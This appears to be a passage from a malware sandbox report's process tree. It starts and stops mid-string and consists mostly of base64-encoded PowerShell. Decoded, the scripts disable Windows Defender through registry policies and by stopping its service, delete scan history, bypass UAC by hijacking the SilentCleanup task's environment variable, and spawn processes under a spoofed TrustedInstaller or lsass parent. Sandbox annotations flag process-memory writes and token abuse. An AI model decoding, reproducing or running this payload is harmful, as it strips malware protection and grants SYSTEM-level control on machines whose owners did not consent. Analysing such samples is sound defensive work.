QAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAnACAARQBuAGEAYgBsAGUAUwBtAGEAcgB0AFMAYwByAGUAZQBuACAAMAAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAbgBlAHQAMQAgAHMAdABvAHAAIAB3AGkAbgBkAGUAZgBlAG4AZAAKAHMAYwAuAGUAeABlACAAYwBvAG4AZgBpAGcAIAB3AGkAbgBkAGUAZgBlAG4AZAAgAGQAZQBwAGUAbgBkAD0AIABSAHAAYwBTAHMALQBUAE8ARwBHAEwARQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAKAHMAdABhAHIAdAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACsAJwBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAHAAQwBtAGQAUgB1AG4ALgBlAHgAZQAnACkAIAAtAEEAcgBnACAAJwAtAEQAaQBzAGEAYgBsAGUAUwBlAHIAdgBpAGMAZQAnACAALQB3AGkAbgAgADEACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABtAHAAZQBuAGcAaQBuAGUAZABiAC4AZABiACcAKQAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwACAAIAAgACAAIAAgACAAIAAgACAAIAAjACMAIABDAG8AbQBtAGUAbgB0AGUAZAAgAD0AIABrAGUAZQBwACAAcwBjAGEAbgAgAGgAaQBzAHQAbwByAHkACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAKACcAQAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwADsAIABpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkACgAjAC0AXwAtACMA
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4180
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\system32\sc.exe" qc windefend
            4⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:4140
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1968
          • C:\Windows\SysWOW64\whoami.exe
            "C:\Windows\system32\whoami.exe" /groups
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1688
          • C:\Windows\SysWOW64\net1.exe
            "C:\Windows\system32\net1.exe" start TrustedInstaller
            4⤵
            • System Location Discovery: System Language Discovery
            PID:756
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ACgBzAHAAIAAnAEgASwBDAFUAOgBcAFYAbwBsAGEAdABpAGwAZQAgAEUAbgB2AGkAcgBvAG4AbQBlAG4AdAAnACAAJwBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAJwAgAEAAJwAKAGkAZgAgACgAJAAoAHMAYwAuAGUAeABlACAAcQBjACAAdwBpAG4AZABlAGYAZQBuAGQAKQAgAC0AbABpAGsAZQAgACcAKgBUAE8ARwBHAEwARQAqACcAKQAgAHsAJABUAE8ARwBHAEwARQA9ADcAOwAkAEsARQBFAFAAPQA2ADsAJABBAD0AJwBFAG4AYQBiAGwAZQAnADsAJABTAD0AJwBPAEYARgAnAH0AZQBsAHMAZQB7ACQAVABPAEcARwBMAEUAPQA2ADsAJABLAEUARQBQAD0ANwA7ACQAQQA9ACcARABpAHMAYQBiAGwAZQAnADsAJABTAD0AJwBPAE4AJwB9AAoACgBpAGYAIAAoACQAZQBuAHYAOgAxACAALQBuAGUAIAA2ACAALQBhAG4AZAAgACQAZQBuAHYAOgAxACAALQBuAGUAIAA3ACkAIAB7ACAAJABlAG4AdgA6ADEAPQAkAFQATwBHAEcATABFACAAfQAKAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQAKAAoAJABuAG8AdABpAGYAPQAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAXABTAGUAdAB0AGkAbgBnAHMAXABXAGkAbgBkAG8AdwBzAC4AUwB5AHMAdABlAG0AVABvAGEAcwB0AC4AUwBlAGMAdQByAGkAdAB5AEEAbgBkAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAnAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAACgBzAHAAIAAkAG4AbwB0AGkAZgAgAEUAbgBhAGIAbABlAGQAIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZgAgACgAJABUAE8ARwBHAEwARQAgAC0AZQBxACAANwApACAAewByAHAAIAAkAG4AbwB0AGkAZgAgAEUAbgBhAGIAbABlAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAB9AAoACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAAoAJABiAHAAYQBzAHMAPQAkAGIAYQBmAGYAbABpAG4AZwAuAEcAZQB0AFQAYQBzAGsAKAAnAFMAaQBsAGUAbgB0AEMAbABlAGEAbgB1AHAAJwApADsAIAAkAGYAbABhAHcAPQAkAGIAcABhAHMAcwAuAEQAZQBmAGkAbgBpAHQAaQBvAG4ACgAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ACgAKACQAcgA9AFsAYwBoAGEAcgBdADEAMwA7ACAAJABuAGYAbwA9AFsAYwBoAGEAcgBdADMAOQArACQAcgArACcAIAAoAFwAIAAgACAALwApACcAKwAkAHIAKwAnACgAIAAqACAALgAgACoAIAApACAAIABBACAAbABpAG0AaQB0AGUAZAAgAGEAYwBjAG8AdQBuAHQAIABwAHIAbwB0AGUAYwB0AHMAIAB5AG8AdQAgAGYAcgBvAG0AIABVAEEAQwAgAGUAeABwAGwAbwBpAHQAcwAnACsAJAByACsAJwAgACAAIAAgAGAAYABgACcAKwAkAHIAKwBbAGMAaABhAHIAXQAzADkACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcACgAkAHMAYwByAGkAcAB0ACsAPQAnADsAaQBlAHgAKAAoAGcAcAAgAFIAZQBnAGkAcwB0AHIAeQA6ADoASABLAEUAWQBfAFUAcwBlAHIAcwBcAFMALQAxAC0ANQAtADIAMQAqAFwAVgBvAGwAYQB0AGkAbABlACoAIABUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAIAAtAGUAYQAgADAAKQBbADAAXQAuAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgApAH0AJwA7ACAAJABjAG0AZAA9ACcAcABvAHcAZQByAHMAaABlAGwAbAAgACcAKwAkAHMAYwByAGkAcAB0AAoACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewAKACAAIABzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxADsAIABiAHIAZQBhAGsACgB9AAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsACgAgACAAaQBmACAAKAAkAGYAbABhAHcALgBBAGMAdABpAG8AbgBzAC4ASQB0AGUAbQAoADEAKQAuAFAAYQB0AGgAIAAtAGkAbgBvAHQAbABpAGsAZQAgACcAKgB3AGkAbgBkAGkAcgAqACcAKQB7AHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawB9AAoAIAAgAHMAcAAgAGgAawBjAHUAOgBcAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAHcAaQBuAGQAaQByACAAJAAoACcAcABvAHcAZQByAHMAaABlAGwAbAAgACcAKwAkAHMAYwByAGkAcAB0ACsAJwAgACMAJwApAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ACgAgACAAaQBmACgAZwBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAKQB7AHIAcAAgAGgAawBjAHUAOgBcAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAAgAHcAaQBuAGQAaQByACAALQBlAGEAIAAwADsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQB9ADsAYgByAGUAYQBrAAoAfQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AAoAIAAgACQAQQA9AFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuACIARABlAGYAYABpAG4AZQBEAHkAbgBhAG0AaQBjAEEAcwBzAGUAbQBiAGwAeQAiACgAMQAsADEAKQAuACIARABlAGYAYABpAG4AZQBEAHkAbgBhAG0AaQBjAE0AbwBkAHUAbABlACIAKAAxACkAOwAkAEQAPQBAACgAKQA7ADAALgAuADUAfAAlAHsAJABEACsAPQAkAEEALgAiAEQAZQBmAGAAaQBuAGUAVAB5AHAAZQAiACgAJwBBACcAKwAkAF8ALAAKACAAIAAxADEANwA5ADkAMQAzACwAWwBWAGEAbAB1AGUAVAB5AHAAZQBdACkAfQAgADsANAAsADUAfAAlAHsAJABEACsAPQAkAEQAWwAkAF8AXQAuACIATQBhAGsAYABlAEIAeQBSAGUAZgBUAHkAcABlACIAKAApAH0AIAA7ACQASQA9AFsASQBuAHQAMwAyAF0AOwAkAEoAPQAiAEkAbgB0AGAAUAB0AHIAIgA7ACQAUAA9ACQASQAuAG0AbwBkAHUAbABlAC4ARwBlAHQAVAB5AHAAZQAoACIAUwB5AHMAdABlAG0ALgAkAEoAIgApADsAIAAkAEYAPQBAACgAMAApAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQAKACAAIAAkAFMAPQBbAFMAdAByAGkAbgBnAF0AOwAgACQAOQA9ACQARABbADAAXQAuACIARABlAGYAYABpAG4AZQBQAEkAbgB2AG8AawBlAE0AZQB0AGgAbwBkACIAKAAnAEMAcgBlAGEAdABlAFAAcgBvAGMAZQBzAHMAJwAsACIAawBlAHIAbgBlAGwAYAAzADIAIgAsADgAMgAxADQALAAxACwAJABJACwAQAAoACQAUwAsACQAUwAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQAUwAsACQARABbADYAXQAsACQARABbADcAXQApACwAMQAsADQAKQAKACAAIAAxAC4ALgA1AHwAJQB7ACQAawA9ACQAXwA7ACQAbgA9ADEAOwAkAEYAWwAkAF8AXQB8ACUAewAkADkAPQAkAEQAWwAkAGsAXQAuACIARABlAGYAYABpAG4AZQBGAGkAZQBsAGQAIgAoACcAZgAnACsAJABuACsAKwAsACQAXwAsADYAKQB9AH0AOwAkAFQAPQBAACgAKQA7ADAALgAuADUAfAAlAHsAJABUACsAPQAkAEQAWwAkAF8AXQAuACIAQwByAGAAZQBhAHQAZQBUAHkAcABlACIAKAApADsAJABaAD0AWwB1AGkAbgB0AHAAdAByAF0AOgA6AHMAaQB6AGUACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AAoAIAAgACQAVwBQAD0AJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAFcAcgBpAHQAZQAkAEoAIgAsAFsAdAB5AHAAZQBbAF0AXQAoACQASgAsACQASgApACkAOwAgACQASABHAD0AJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAEEAbABsAG8AYwBIAGAARwBsAG8AYgBhAGwAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAGkAbgB0ADMAMgAnACkAOwAgACQAdgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFoAKQAKACAAIAAnAFQAcgB1AHMAdABlAGQASQBuAHMAdABhAGwAbABlAHIAJwAsACcAbABzAGEAcwBzACcAfAAlAHsAaQBmACgAIQAkAHAAbgApAHsAbgBlAHQAMQAgAHMAdABhAHIAdAAgACQAXwAgADIAPgAmADEAIAA+ACQAbgB1AGwAbAA7ACQAcABuAD0AWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AFAAcgBvAGMAZQBzAHMAZQBzAEIAeQBOAGEAbQBlACgAJABfACkAWwAwAF0AOwB9AH0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQAKACAAIAAkAFQAMgAuAGYAMgA9ADEAOwAkAFQAMgAuAGYAMwA9ADEAOwAkAFQAMgAuAGYANAA9ADEAOwAkAFQAMgAuAGYANgA9ACQAVAAxADsAJABUADMALgBmADEAPQAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsANABdACkAOwAkAFQANAAuAGYAMQA9ACQAVAAzADsAJABUADQALgBmADIAPQAkAEgARwAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABTAFoALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAVABbADIAXQApACkACgAgACAAJABIAC4AIgBHAGUAdABgAE0AZQB0AGgAbwBkACIAKAAiAFMAdAByAHUAYwB0AHUAcgBlAFQAbwBgAFAAdAByACIALABbAHQAeQBwAGUAWwBdAF0AKAAkAEQAWwAyAF0ALAAkAEoALAAnAGIAbwBvAGwAZQBhAG4AJwApACkALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAoACQAVAAyAC0AYQBzACAAJABEAFsAMgBdACkALAAkAFQANAAuAGYAMgAsACQAZgBhAGwAcwBlACkAKQA7ACQAdwBpAG4AZABvAHcAPQAwAHgAMABFADAAOAAwADYAMAAwAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawAKAH0ACgAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAAoAJwAgAFMAZQBjAHUAcgBpAHQAeQAgAEMAZQBuAHQAZQByAFwATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAnACwAJwBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAsACcAXABNAHAARQBuAGcAaQBuAGUAJwAsACcAXABTAHAAeQBuAGUAdAAnACwAJwBcAFIAZQBhAGwALQBUAGkAbQBlACAAUAByAG8AdABlAGMAdABpAG8AbgAnACAAfAAlACAAewBuAGkAIAAoACQAdwBkAHAAKwAkAF8AKQAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAfQAKAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAnACAARQBuAGEAYgBsAGUAUwBtAGEAcgB0AFMAYwByAGUAZQBuACAAMAAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAAoAbgBlAHQAMQAgAHMAdABvAHAAIAB3AGkAbgBkAGUAZgBlAG4AZAAKAHMAYwAuAGUAeABlACAAYwBvAG4AZgBpAGcAIAB3AGkAbgBkAGUAZgBlAG4AZAAgAGQAZQBwAGUAbgBkAD0AIABSAHAAYwBTAHMALQBUAE8ARwBHAEwARQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAKAHMAdABhAHIAdAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACsAJwBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAHAAQwBtAGQAUgB1AG4ALgBlAHgAZQAnACkAIAAtAEEAcgBnACAAJwAtAEQAaQBzAGEAYgBsAGUAUwBlAHIAdgBpAGMAZQAnACAALQB3AGkAbgAgADEACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABtAHAAZQBuAGcAaQBuAGUAZABiAC4AZABiACcAKQAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwACAAIAAgACAAIAAgACAAIAAgACAAIAAjACMAIABDAG8AbQBtAGUAbgB0AGUAZAAgAD0AIABrAGUAZQBwACAAcwBjAGEAbgAgAGgAaQBzAHQAbwByAHkACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAKACcAQAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwADsAIABpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkACgAjAC0AX